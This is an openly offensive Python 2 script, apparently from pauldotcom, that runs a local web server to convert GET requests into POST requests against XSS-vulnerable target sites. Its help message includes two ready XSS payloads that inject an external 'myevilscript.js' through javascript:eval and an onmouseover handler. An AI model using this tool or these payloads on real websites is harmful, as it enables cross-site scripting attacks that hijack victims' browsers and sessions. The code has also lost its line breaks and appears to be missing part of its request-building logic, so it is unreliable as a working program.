#XSS GET to POST script by mark baggett http://www.pauldotcom.com #start it like this... python get2post.py #use it like this... http://:8080/?target=http://www.targeturl.com&postparam=postvalue&anotherparam=itsvalue&postvariable=itsvalue import os import sys import BaseHTTPServer import urlparse import re class SimplestWebHandler(BaseHTTPServer.BaseHTTPRequestHandler): clientfilter="" def do_GET(self): self.send_response(200) self.end_headers() (ignore, ignore, ignore, urlparams, ignore) = urlparse.urlsplit(self.path) tgturl=re.search("target=(http://[\w.:]+)",urlparams) #pdb.set_trace() if self.clientfilter and self.client_address[0] != self.clientfilter: self.wfile.write('Go Away.') return if not tgturl: self.wfile.write('You need to specify a target parameter and post parameters.

For example: http://thishost.com?target=http://victim.com/xssvulnerable.php&postparam1=postvalue1

Notes: These have been useful in the past.

Inject into current page without > and < :javascript:eval("s=document.createElement(\'script\');s.src=\'myevilscript.js\';document.getElementsByTagName(\'head\')[0].appendChild(s)")

Same thing on a javascript event :onmouseover="s=document.createElement(\'script\');s.src=\'myevilscript.js\';document.getElementsByTagName(\'head\')[0].appendChild(s)"') return htmlresult=[] self.wfile.write('

') def main(): serverport=8080 tmpclientfilt="" if '-h' in sys.argv: print """Usage: get2post.py [options] Options: -p server port Define a port for the server to listen on. Default 8080 -c clientip Filter incoming connections and only allow the specified client to use the tool. """ sys.exit(2) for i in range(1,len(sys.argv),1): if sys.argv[i] == '-p': serverport=int(sys.argv[i+1]) if sys.argv[i] == '-c': tmpclientfilt=sys.argv[i+1] server = BaseHTTPServer.HTTPServer(('', serverport), SimplestWebHandler) SimplestWebHandler.clientfilter=tmpclientfilt print 'Server is looping.' server.serve_forever() if __name__ == '__main__': main()